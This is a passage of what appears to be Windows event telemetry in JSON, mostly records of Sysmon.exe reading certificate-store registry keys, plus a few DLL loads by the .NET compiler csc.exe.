"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
- "registry_value": "Certificates", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859340000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570860430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", 
- "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\SysWOW64\\combase.dll", - "pid": 3592, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570859490000, - "unique_pid": "{42FC7E13-CADD-5C05-0000-00107B224D01}" - }, - { - "event_type": "registry", 
- "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570860740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570860890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - 
"timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570861050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
